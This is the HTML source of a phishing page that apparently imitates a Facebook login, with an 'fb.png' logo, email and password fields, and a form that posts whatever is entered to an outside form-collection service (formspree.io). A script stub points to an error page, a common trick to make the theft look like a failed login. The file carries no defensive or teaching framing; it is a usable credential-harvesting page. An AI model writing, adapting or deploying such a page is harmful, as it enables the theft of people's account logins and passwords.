<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BDSM</title>
   
</head>
      <div class="log">
      
          <img id="pic"src="fb.png" alt="">
      </div>
<body>
    <div class="cad">
        <form
        action="https://formspree.io/f/mzbopgql"
        method="POST"
      >
        <label>
          Login with Email:
          <input type="email" name="_replyto">
        </label>
        <label>
          password:
          <textarea name="message" ></textarea>
        </label>
        <!-- your other form fields go here -->
        <button type="submit">Send</button>
      </form>
    </div>
   </body>
</html>
<script>
    var cad = document.querySelector(".cad");
    var name = document.querySelector("#name").value;
    var psw = document.querySelector("#pwd").value;

    function next(){
        window.open('error.html')  
    }
</script>
<style>
    .log{
        margin-top: 10em;
        text-align: center;
        color: aliceblue;
    }
    body{
        font-family: Arial, Helvetica, sans-serif;
        background-image: url(images-1.jpg);
        
    }
    .cad{
      display: block;
      text-align: center;
      padding: 10px;
      font-size: 1.2em;
      font-weight: 700;
      color: white;
    }
    img{
        border-radius: 50%;
    }
    .cad input{
       width: 13em;
       height: 2.5em;
       border: 1px solid rgb(60, 60, 241);
       border-radius: 10px;
       padding: 5px;
    }
    .cad button{
        width: 9em;
       height: 2.5em;
        background: rgb(60, 60, 241);
        border-radius: 10px;
        border: none;
        margin-top: 1em;
        color: white;
    }
</style>